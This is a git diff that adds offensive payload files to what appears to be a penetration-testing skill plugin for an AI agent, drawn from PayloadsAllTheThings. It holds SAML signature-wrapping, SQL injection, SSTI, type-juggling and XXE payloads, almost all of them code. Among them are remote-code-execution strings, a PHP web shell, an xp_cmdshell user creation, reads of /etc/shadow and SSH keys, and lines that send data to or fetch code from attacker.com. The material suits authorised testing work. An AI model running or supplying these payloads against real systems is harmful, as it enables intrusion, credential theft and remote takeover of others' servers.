signature: +```xml +<SAMLResponse> + <FA ID="evil"><Subject>Attacker</Subject></FA> + <LA ID="legit"><Subject>LegitUser</Subject> + <Signature><Reference URI="legit"/></Signature> + </LA> +</SAMLResponse> +``` + +**XSW3** — Duplicate assertion before signed assertion: +```xml +<SAMLResponse> + <Assertion ID="evil"><NameID>admin</NameID></Assertion> + <Assertion ID="legit"><NameID>user</NameID> + <Signature><Reference URI="legit"/></Signature> + </Assertion> +</SAMLResponse> +``` + +**XSW7** — Unsigned assertion in Extensions block: +```xml +<SAMLResponse> + <Extensions> + <Assertion ID="evil"><NameID>admin</NameID></Assertion> + </Extensions> + <Assertion ID="legit"><NameID>user</NameID> + <Signature><Reference URI="legit"/></Signature> + </Assertion> +</SAMLResponse> +``` + +### XXE via Entity Substitution (bypasses signature) +```xml +<!DOCTYPE Response [ + <!ENTITY s "s"> + <!ENTITY f1 "f1"> +]> +<saml2p:Response> + <saml2:AttributeValue>&s;taf&f1;</saml2:AttributeValue> +</saml2p:Response> +<!-- Resolves to "staff" post-parsing, bypassing signature on "staf&f1;" --> +``` + +### SSRF via XSLT unparsed-text() +```xml +<xsl:variable name="url" select="concat('http://169.254.169.254/latest/meta-data/')"/> +<xsl:value-of select="unparsed-text($url)"/> +``` + +## Bypass Variants + +| Technique | Target | Notes | +|---|---|---| +| Signature stripping | Systems skipping absent-sig check | Remove `<ds:Signature>` block | +| Comment injection | NameID parsers | `user<!--x-->.attacker.com` | +| Null byte | Some XML parsers | `admin%00attacker.com` | +| Whitespace in NameID | Trim-only parsers | ` admin ` vs `admin` | +| Case variation in role | Role-check logic | `Admin` vs `admin` | +| Base64-encoding NameID | Custom SP implementations | `<NameID Format="...base64...">YWRtaW4=` | + +## Notes + +- **Tools**: SAMLRaider (Burp), XSW plugin, ZAP SAML Support +- Decode SAML with: `echo <base64> | base64 -d | zcat` (if gzip) or just `base64 -d` +- XSW attacks: try all 8 variants (XSW1–XSW8); behavior differs per SP library +- XXE inside SAML often bypasses WAF because SP processes before WAF sees decrypted payload +- Signature stripping most reliable on older OneLogin/Shibboleth < patched versions + +--- +*Full list: `patt-fetcher` agent → "SAML Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/basic.md new file mode 100644 index 0000000..32ad25a --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/basic.md @@ -0,0 +1,115 @@ +--- +source: PayloadsAllTheThings +patt-path: SQL Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/SQL%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# SQL Injection — Basic Payloads + +## Auth Bypass + +```sql +' OR '1'='1'-- +' or 1=1 limit 1 -- +admin'-- +admin' OR '1'='1'-- +' OR 1=1-- +``` + +**PHP MD5/SHA1 magic hashes:** +``` +ffifdyop # MD5 → 'or'6... +3fDf # SHA1 → '='... +``` + +## UNION-Based — Column Count Discovery + +```sql +' ORDER BY 1-- +' ORDER BY 2-- +' ORDER BY N-- # increment until error +' UNION SELECT NULL-- +' UNION SELECT NULL,NULL-- +' UNION SELECT NULL,NULL,NULL-- +``` + +## UNION Payloads by DB + +**MySQL:** +```sql +1' UNION SELECT username,password FROM users-- +1' UNION ALL SELECT table_name,column_name FROM information_schema.tables-- +1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- +``` + +**MSSQL:** +```sql +1' UNION SELECT username,password FROM users-- +1' UNION SELECT name,NULL FROM sysobjects WHERE xtype='U'-- +1' UNION SELECT table_name,NULL FROM information_schema.tables-- +``` + +**PostgreSQL:** +```sql +1' UNION SELECT usename,passwd FROM pg_shadow-- +1' UNION SELECT table_name,NULL FROM information_schema.tables-- +``` + +**Oracle:** +```sql +1' UNION SELECT username,password FROM all_users-- +1' UNION SELECT table_name,NULL FROM all_tables-- +1' UNION SELECT NULL,NULL FROM DUAL-- +``` + +## Error-Based Payloads + +**MySQL:** +```sql +' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))-- +' AND UPDATEXML(1,CONCAT(0x7e,(SELECT database())),1)-- +``` + +**MSSQL:** +```sql +' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))-- +``` + +**PostgreSQL:** +```sql +' AND CAST((SELECT version()) AS numeric)-- +' LIMIT CAST((SELECT version()) AS numeric)-- +``` + +**Oracle:** +```sql +' AND 1=utl_inaddr.get_host_name((SELECT banner FROM v$version WHERE rownum=1))-- +``` + +## Stacked Queries + +```sql +'; INSERT INTO users VALUES('hacker','hacked')-- -- MSSQL/PostgreSQL +'; DROP TABLE users-- +'; EXEC xp_cmdshell('whoami')-- -- MSSQL +``` + +## MSSQL xp_cmdshell + +```sql +'; EXEC xp_cmdshell('whoami')-- +'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE-- +'; EXEC xp_cmdshell('powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://attacker/shell.ps1'')"')-- +``` + +## Second-Order SQLi + +Payload stored in DB, executed later: +```sql +-- Registration: username = admin'-- +-- Login query becomes: SELECT * FROM users WHERE username='admin'--' AND password='...' +``` + +*Full list: patt-fetcher agent → "SQL Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/blind.md b/plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/blind.md new file mode 100644 index 0000000..6485e0e --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/blind.md @@ -0,0 +1,91 @@ +--- +source: PayloadsAllTheThings +patt-path: SQL Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/SQL%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# SQL Injection — Blind Payloads + +## Time-Based Blind + +**MySQL:** +```sql +' AND SLEEP(5)-- +' AND IF(1=1,SLEEP(5),0)-- +' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)-- +' AND IF(LENGTH(database())=8,SLEEP(5),0)-- +1' AND BENCHMARK(10000000,MD5(1))-- +``` + +**MSSQL:** +```sql +'; WAITFOR DELAY '0:0:5'-- +'; IF (SELECT COUNT(*) FROM users WHERE username='admin')>0 WAITFOR DELAY '0:0:5'-- +'; IF (ASCII(SUBSTRING((SELECT TOP 1 table_name FROM information_schema.tables),1,1))>64) WAITFOR DELAY '0:0:5'-- +``` + +**PostgreSQL:** +```sql +'; SELECT pg_sleep(5)-- +' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)-- +' AND (SELECT CASE WHEN (username='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users)-- +``` + +**Oracle:** +```sql +' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)-- +' AND (SELECT CASE WHEN (1=1) THEN TO_CHAR(DBMS_PIPE.RECEIVE_MESSAGE('a',5)) ELSE NULL END FROM DUAL) IS NOT NULL-- +``` + +## Boolean-Based Blind + +**Confirming vulnerability:** +``` +?id=1 AND 1=1-- # true → normal response +?id=1 AND 1=2-- # false → different response +``` + +**Extracting data character by character:** +```sql +' AND SUBSTRING(database(),1,1)='a'-- +' AND ASCII(SUBSTRING(database(),1,1))=97-- +' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1))>64-- +' AND LENGTH(database())=8-- +``` + +**MySQL hostname extraction:** +```sql +' AND LENGTH(@@hostname)=N-- +' AND ASCII(SUBSTRING(@@hostname,1,1))=104-- +' AND SUBSTRING(VERSION(),1,1) LIKE '5'-- +``` + +**SQLite boolean:** +```sql +' AND CASE WHEN (1=1) THEN 1 ELSE json('') END-- +' AND CASE WHEN (SELECT substr(password,1,1) FROM users LIMIT 1)='a' THEN 1 ELSE json('') END-- +``` + +## Out-of-Band (OOB) Exfiltration + +**MySQL DNS exfil:** +```sql +' AND LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\'))-- +' UNION SELECT LOAD_FILE(CONCAT(0x5c5c5c5c,(SELECT database()),0x2e61747461636b65722e636f6d5c5c61))-- +``` + +**MSSQL DNS exfil:** +```sql +'; EXEC master..xp_dirtree '\\attacker.com\share'-- +'; DECLARE @q varchar(1024); SET @q='\\'+@@version+'.attacker.com\x'; EXEC master.dbo.xp_dirtree @q-- +``` + +**PostgreSQL OOB:** +```sql +'; COPY (SELECT version()) TO PROGRAM 'curl http://attacker.com/?d='||version()-- +'; SELECT dblink_connect('host=attacker.com user=a password='||(SELECT password FROM users LIMIT 1)||' dbname=a')-- +``` + +*Full list: patt-fetcher agent → "SQL Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/bypass.md b/plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/bypass.md new file mode 100644 index 0000000..fe879a1 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/bypass.md @@ -0,0 +1,107 @@ +--- +source: PayloadsAllTheThings +patt-path: SQL Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/SQL%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# SQL Injection — WAF Bypass Payloads + +## Case Mixing + +```sql +SeLeCt * fRoM users +aNd 1=1 +UnIoN sElEcT 1,2,3 +``` + +## Comment Injection + +```sql +UN/**/ION/**/SE/**/LECT 1,2,3 +1/*!UNION*//*!SELECT*/1,2,3-- +1/*!12345UNION*//*!12345SELECT*/1-- +1 UNION-- ++SELECT 1-- +``` + +## Whitespace Bypass + +```sql +?id=1%09AND%091=1-- # tab +?id=1%0AAND%0A1=1-- # newline +?id=1%0DAND%0D1=1-- # carriage return +?id=1%0CAND%0C1=1-- # form feed +?id=1%A0AND%A01=1-- # non-breaking space +SELECT(1)FROM(users)WHERE(id=1) +``` + +## Encoding Bypass + +```sql +-- URL encoding +%27 OR %271%27=%271 +%2527 # double URL-encoded quote + +-- Hex encoding (MySQL) +0x61646d696e # 'admin' in hex +WHERE username=0x61646d696e + +-- Unicode +ʼ (U+02BC) # modifier letter apostrophe +' (U+FF07) # fullwidth apostrophe +``` + +## No-Comma Bypass + +```sql +-- Instead of: SELECT 1,2,3 +SELECT 1 UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c-- + +-- Instead of: SUBSTR('SQL',1,1) +SUBSTR('SQL' FROM 1 FOR 1) + +-- Instead of: LIMIT 0,1 +LIMIT 1 OFFSET 0 +``` + +## No-Equals Bypass + +```sql +SUBSTRING(VERSION(),1,1) LIKE '5' +SUBSTRING(VERSION(),1,1) NOT IN (4,3) +SUBSTRING(VERSION(),1,1) BETWEEN 4 AND 6 +SUBSTRING(VERSION(),1,1) REGEXP '^5' +``` + +## No-Spaces Bypass + +```sql +'or(1=1)# +UNION(SELECT(1),(2),(3)) +SELECT/**/username/**/FROM/**/users +``` + +## Keyword Bypass (double keyword) + +```sql +UNUNIONION SELSELECTECT 1,2,3 # if WAF strips once +SESELECTLECT 1,2,3 +``` + +## HTTP Parameter Pollution + +``` +?id=1&id=UNION&id=SELECT 1,2,3 +``` + +## Second-Order / Stored Bypass + +Inject into stored field, trigger via second request: +```sql +-- Registration field: 1' UNION SELECT password FROM users-- +-- Query on profile load executes the payload +``` + +*Full list: patt-fetcher agent → "SQL Injection"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/sql-injection/sql-injection-quickstart.md b/plugins/pentest/skills/pentest/attacks/injection/sql-injection/sql-injection-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/sql-injection/sql-injection-quickstart.md rename to plugins/pentest/skills/pentest/attacks/injection/sql-injection/sql-injection-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/sql-injection/sql-injection.md b/plugins/pentest/skills/pentest/attacks/injection/sql-injection/sql-injection.md similarity index 97% rename from projects/pentest/.claude/skills/pentest/attacks/injection/sql-injection/sql-injection.md rename to plugins/pentest/skills/pentest/attacks/injection/sql-injection/sql-injection.md index b64c6ad..6e72253 100644 --- a/projects/pentest/.claude/skills/pentest/attacks/injection/sql-injection/sql-injection.md +++ b/plugins/pentest/skills/pentest/attacks/injection/sql-injection/sql-injection.md @@ -2958,3 +2958,53 @@ SQL injection remains a critical vulnerability despite being well-understood for **Document Version:** 1.0 **Last Updated:** 2026-01-09 **Maintainer:** Penetration Testing Team + +--- + +<!-- PATT enrichment 2026-03-13 --> +## PATT Enrichment: Advanced Techniques + +### Second-Order SQL Injection +Second-order (stored) SQLi occurs when user input is safely stored but unsafely used later. + +```sql +-- Registration: store payload (safely escaped on input) +Username: admin'-- + +-- Later, password change query uses stored value unsafely: +UPDATE users SET password='newpass' WHERE username='admin'--' + +-- Test pattern: register with SQLi payload, trigger in profile/settings +-- Look for: profile updates, password resets, search history, saved searches +``` + +**Detection approach:** +1. Register/store payload: `test' OR '1'='1` +2. Trigger the stored value in a different function +3. Observe behavior difference vs. non-payload input + +### MSSQL: xp_cmdshell OS Command Execution +When SQL Server runs as high-privilege account and xp_cmdshell is enabled (or can be enabled): + +```sql +-- Enable xp_cmdshell (requires sysadmin) +EXEC sp_configure 'show advanced options', 1; RECONFIGURE; +EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; + +-- Execute OS command +EXEC xp_cmdshell 'whoami'; +EXEC xp_cmdshell 'net user hacker P@ss /add'; +EXEC xp_cmdshell 'powershell -enc <base64>'; + +-- Stacked query injection to enable + exec +'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'-- + +-- Check if already enabled +SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell'; + +-- Alternative: Ole Automation Procedures +EXEC sp_oacreate 'wscript.shell', @shell OUT; +EXEC sp_oamethod @shell, 'run', NULL, 'cmd /c whoami > C:\output.txt'; +``` + +*Full list: patt-fetcher agent → "SQL Injection MSSQL"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/ssti/payloads/by-engine.md b/plugins/pentest/skills/pentest/attacks/injection/ssti/payloads/by-engine.md new file mode 100644 index 0000000..6784f89 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/ssti/payloads/by-engine.md @@ -0,0 +1,130 @@ +--- +source: PayloadsAllTheThings +patt-path: Server Side Template Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Template%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# SSTI — By Engine + +## Engine Identification Decision Tree + +``` +Inject: {{7*7}} +├── Renders 49? +│ ├── ZeroDivisionError on {{1/0}} → JINJA2 (Python) +│ ├── "divided by 0" error → MAKO (Python) +│ └── No error, renders 49 → TWIG (PHP) or PEBBLE (Java) +├── Renders {{7*7}} literally? +│ ├── Try ${7*7} → renders 49 → FREEMARKER (Java) or THYMELEAF +│ └── Try #{7*7} → renders 49 → RUBY ERB / JRUBY +└── Error / blank → check ${7*7}, #{7*7}, <%= 7*7 %> +``` + +**Universal polyglot probe:** +``` +${{<%[%'"}}%\. +``` + +--- + +## Jinja2 (Python / Flask) + +**Detection:** `{{7*7}}` → `49` + +**Config dump:** +``` +{{config.items()}} +{{config}} +``` + +**RCE via __mro__ sandbox escape:** +``` +{{''.__class__.__mro__[1].__subclasses__()}} +{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip()}} +{{request.__class__.__mro__[8].__subclasses__()[40]('/etc/passwd').read()}} +``` + +**RCE via globals:** +``` +{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}} +{{cycler.__init__.__globals__.os.popen('id').read()}} +{{joiner.__init__.__globals__.os.popen('whoami').read()}} +``` + +--- + +## Twig (PHP / Symfony) + +**Detection:** `{{7*7}}` → `49` + +**RCE:** +``` +{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}} +``` + +**File read:** +``` +{{'/etc/passwd'|file_excerpt(1,30)}} +``` + +--- + +## Freemarker (Java) + +**Detection:** `${7*7}` → `49` | error: "Arithmetic operation failed" + +**RCE:** +``` +<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} +<#assign ob="freemarker.template.utility.ObjectConstructor"?new()> +${ob("java.lang.ProcessBuilder","id").start()} +``` + +**File read:** +``` +${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join('')} +``` + +--- + +## Pebble (Java) + +**Detection:** `{{7*7}}` → `49` + +**RCE:** +``` +{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('id') }} +{% set x = "java.lang.Runtime" | upper %} +``` + +--- + +## Mako (Python) + +**Detection:** `${7*7}` → `49` + +**RCE:** +``` +${__import__('os').popen('id').read()} +<% +import os +x=os.popen('id').read() +%>${x} +``` + +--- + +## Smarty (PHP) + +**Detection:** `{$smarty.version}` → version string + +**RCE:** +``` +{php}echo `id`;{/php} +{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} +``` + +*Full list: patt-fetcher agent → "Server Side Template Injection"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/ssti/ssti-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/injection/ssti/ssti-cheat-sheet.md similarity index 92% rename from projects/pentest/.claude/skills/pentest/attacks/injection/ssti/ssti-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/injection/ssti/ssti-cheat-sheet.md index 0732388..1f0723d 100644 --- a/projects/pentest/.claude/skills/pentest/attacks/injection/ssti/ssti-cheat-sheet.md +++ b/plugins/pentest/skills/pentest/attacks/injection/ssti/ssti-cheat-sheet.md @@ -954,3 +954,47 @@ Exploit: theme}}<%= `whoami` %>{{ --- **Remember:** Always obtain proper authorization before testing for SSTI vulnerabilities. Unauthorized testing is illegal. + +--- + +<!-- PATT enrichment 2026-03-13 --> +## PATT Enrichment: Sandbox Escape Techniques + +### Sandbox Escape via Python Class Hierarchy +When template engines run in restricted/sandboxed mode, traverse Python's MRO to reach OS access: + +```python +# Jinja2 sandbox escape — reach subprocess via class hierarchy +{{ ''.__class__.__mro__[1].__subclasses__() }} + +# Find index of subprocess.Popen (varies per Python version) +{{ ''.__class__.__mro__[1].__subclasses__()[396]('id', shell=True, stdout=-1).communicate() }} + +# Alternative: use __builtins__ if accessible +{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }} + +# Twig (PHP) sandbox escape +{{ _self.env.registerUndefinedFilterCallback("exec") }}{{ _self.env.getFilter("id") }} + +# Freemarker sandbox escape +<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id")} + +# Pebble (Java) sandbox bypass +{% set cmd = 'id' %} +{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke((1).TYPE.forName('java.lang.Runtime').methods[7].invoke(null),cmd.split(' ')) %} +``` + +### Bypass Filters (underscore/dot restrictions) +```python +# When underscores are filtered +{{ request|attr('__class__') }} +{{ request|attr('\x5f\x5fclass\x5f\x5f') }} + +# When dots are filtered +{{ request['__class__']['__mro__'] }} + +# Jinja2 — using |attr filter +{{ ''|attr('__class__')|attr('__mro__')|last|attr('__subclasses__')() }} +``` + +*Full list: patt-fetcher agent → "SSTI sandbox escape"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/ssti/ssti-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/injection/ssti/ssti-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/ssti/ssti-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/injection/ssti/ssti-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/ssti/ssti-quickstart.md b/plugins/pentest/skills/pentest/attacks/injection/ssti/ssti-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/ssti/ssti-quickstart.md rename to plugins/pentest/skills/pentest/attacks/injection/ssti/ssti-quickstart.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/ssti/ssti-resources.md b/plugins/pentest/skills/pentest/attacks/injection/ssti/ssti-resources.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/ssti/ssti-resources.md rename to plugins/pentest/skills/pentest/attacks/injection/ssti/ssti-resources.md diff --git a/plugins/pentest/skills/pentest/attacks/injection/type-juggling/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/injection/type-juggling/payloads/basic.md new file mode 100644 index 0000000..d85e2c9 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/type-juggling/payloads/basic.md @@ -0,0 +1,130 @@ +--- +source: PayloadsAllTheThings +patt-path: Type Juggling/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Type%20Juggling/README.md +last-curated: 2026-03-14 +priority: high +--- + +# Type Juggling — Basic Payloads + +## Quick Hits + +### PHP loose comparison bypass (== vs ===) +```php +# These evaluate true with loose == +'0' == false == null == '' +'abc' == 0 +'123abc' == 123 +true == 'any_non_empty_string' +``` + +### Auth bypass via boolean serialization +``` +# HTTP POST / cookie payload +a:2:{s:8:"username";b:1;s:8:"password";b:1;} +# b:1 = true; true == "correctpassword" → bypasses auth +``` + +### Magic hash collisions (MD5) +``` +# These MD5 hashes start with 0e (treated as 0 in scientific notation) +240610708 → 0e462097431906509019562988736854 +QNKCDZO → 0e830400451993494058024219903391 +aabg74k → 0e927768628597905296784650551162 +aabC9RqS → 0e041022518165728392052614573919 + +# Test: if login checks md5($input) == md5($stored) with == +# Input any magic hash value → compares 0 == 0 → true +``` + +### Magic hash collisions (SHA1) +``` +10932435112 → 0e07766915004133176347055865026311692244 +aaroZmOk → 0e66507019969427134894567494305185566735 +aaK1STfY → 0e76658526655756207688271159624026011393 +``` + +### JSON type coercion (loose server-side) +```json +{"password": true} +{"password": 0} +{"age": "10 years"} +{"role": ["admin"]} +``` + +## Extended List + +### PHP comparison table (key cases) +| Value A | Value B | == | === | +|---|---|---|---| +| `0` | `"a"` | true (PHP<8) | false | +| `0` | `""` | true (PHP<8) | false | +| `0` | `null` | true | false | +| `"0"` | `false` | true | false | +| `"0"` | `null` | false | false | +| `"1"` | `true` | true | false | +| `100` | `"1e2"` | true | false | +| `"0e123"` | `"0e456"` | true | false | + +### HMAC bypass via magic hash brute force +```python +# If: cookie['hmac'] == hmac(secret, data) +# And comparison is == +# Set hmac = "0", brute-force expiration until hmac(secret, exp) starts with "0e" +# Both sides cast to 0 → bypass + +import hashlib +for i in range(10000000): + h = hashlib.md5(f"secret{i}".encode()).hexdigest() + if h.startswith('0e') and h[2:].isdigit(): + print(f"Magic value: {i} → {h}") + break +``` + +### Switch/case type juggling +```php +# PHP switch uses loose comparison +switch ($role) { + case 0: return "guest"; + case "admin": return "admin"; +} +# Input: role=0 → matches both 0 AND "0admin" if cast to int +``` + +### Array comparison bypass +```php +# [] == false → true +# [] == 0 → true +# [] == null → true +# Payload: pass array instead of string +password[]=anything # in form POST +{"password": []} # in JSON body +``` + +### strcmp() bypass +```php +strcmp([], "secret") === 0 # true — returns NULL, NULL == 0 +# Payload: pass array for compared parameter +``` + +## Bypass Variants + +| Defense | Bypass | +|---|---| +| `===` strict comparison | Cannot bypass with type juggling | +| `in_array()` strict mode | `in_array(val, arr, true)` — pass type too | +| `intval()` cast before compare | Cast strips type confusion | +| PHP 8 string-to-number | `0 == "abc"` is false in PHP 8 | +| Hash comparison as string | Switch to `hash_equals()` | + +## Notes + +- Type juggling only affects PHP; JavaScript has similar `==` issues +- First check PHP version: PHP 8 fixed most `0 == "string"` comparisons +- Magic hashes: attacker only needs to know one colliding input, not the secret +- `strcmp([], x)` returning NULL-as-0 is a common CTF technique +- Always test JSON endpoints with alternate types: string → int → bool → array + +--- +*Full list: `patt-fetcher` agent → "Type Juggling"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/xxe/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/injection/xxe/payloads/basic.md new file mode 100644 index 0000000..f7d859e --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/xxe/payloads/basic.md @@ -0,0 +1,91 @@ +--- +source: PayloadsAllTheThings +patt-path: XXE Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XXE%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# XXE — Basic Payloads + +## Classic File Read — Linux + +```xml +<?xml version="1.0"?> +<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> +<root>&xxe;</root> +``` + +```xml +<?xml version="1.0"?> +<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]> +<foo>&xxe;</foo> +``` + +**Common Linux targets:** +``` +file:///etc/passwd +file:///etc/shadow +file:///etc/hosts +file:///etc/hostname +file:///proc/self/environ +file:///proc/version +file:///var/log/apache2/access.log +file:///root/.ssh/id_rsa +``` + +## Classic File Read — Windows + +```xml +<?xml version="1.0" encoding="ISO-8859-1"?> +<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///c:/boot.ini">]> +<foo>&xxe;</foo> +``` + +**Common Windows targets:** +``` +file:///c:/boot.ini +file:///c:/windows/win.ini +file:///c:/windows/system32/drivers/etc/hosts +file:///c:/users/administrator/desktop/secret.txt +``` + +## SSRF via XXE + +```xml +<?xml version="1.0" encoding="ISO-8859-1"?> +<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]> +<foo>&xxe;</foo> +``` + +```xml +<?xml version="1.0"?> +<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt">]> +<foo>&xxe;</foo> +``` + +## XInclude (when DOCTYPE blocked) + +```xml +<foo xmlns:xi="http://www.w3.org/2001/XInclude"> +<xi:include parse="text" href="file:///etc/passwd"/></foo> +``` + +## Detection — Blind Ping + +```xml +<?xml version="1.0"?> +<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://BURP_COLLABORATOR.net/x">%ext;]> +<r></r> +``` + +## SVG / Other Formats + +```xml +<!-- In SVG upload --> +<?xml version="1.0"?> +<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> +<svg>&xxe;</svg> +``` + +*Full list: patt-fetcher agent → "XXE Injection"* diff --git a/plugins/pentest/skills/pentest/attacks/injection/xxe/payloads/oob.md b/plugins/pentest/skills/pentest/attacks/injection/xxe/payloads/oob.md new file mode 100644 index 0000000..8376e62 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/injection/xxe/payloads/oob.md @@ -0,0 +1,86 @@ +--- +source: PayloadsAllTheThings +patt-path: XXE Injection/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/XXE%20Injection/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# XXE — Out-of-Band Payloads + +## OOB Detection (HTTP callback) + +```xml +<?xml version="1.0"?> +<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://attacker.com/xxe-detect">%ext;]> +<r></r> +``` + +## External DTD — HTTP Exfiltration + +**Payload (sent to server):** +```xml +<?xml version="1.0"?> +<!DOCTYPE message [<!ENTITY % ext SYSTEM "http://attacker.com/evil.dtd">%ext;]> +<message></message> +``` + +**evil.dtd (hosted on attacker server):** +```xml +<!ENTITY % file SYSTEM "file:///etc/passwd"> +<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>"> +%eval; +%exfil; +``` + +## External DTD — Error-Based Exfiltration + +**evil.dtd:** +```xml +<!ENTITY % file SYSTEM "file:///etc/passwd"> +<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> +%eval; +%error; +``` + +## Base64 Encoded Exfiltration (PHP) + +**evil.dtd:** +```xml +<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> +<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>"> +%eval; +%exfil; +``` + +## DNS Exfiltration + +**evil.dtd:** +```xml +<!ENTITY % file SYSTEM "file:///etc/hostname"> +<!ENTITY % eval "<!ENTITY &#x25; dns SYSTEM 'http://%file;.attacker.com/'>"> +%eval; +%dns; +``` + +## XLSX / DOCX XXE (blind via Office files) + +Inject into `[Content_Types].xml` or `xl/workbook.xml`: +```xml +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<!DOCTYPE cdl [<!ELEMENT cdl ANY><!ENTITY % asd SYSTEM "http://attacker.com/evil.dtd">%asd;%c;]> +<cdl>&rrr;</cdl> +``` + +## Attacker Setup + +```bash +# Host evil.dtd +python3 -m http.server 80 + +# Capture exfiltrated data +nc -lvnp 80 +# or use Burp Collaborator +``` + +*Full list: patt-fetcher agent → "XXE Injection"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/injection/xxe/xxe-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/injection/xxe/xxe-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/injection/xxe/xxe-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/injection/xxe/xxe-cheat-sheet.md diff --git 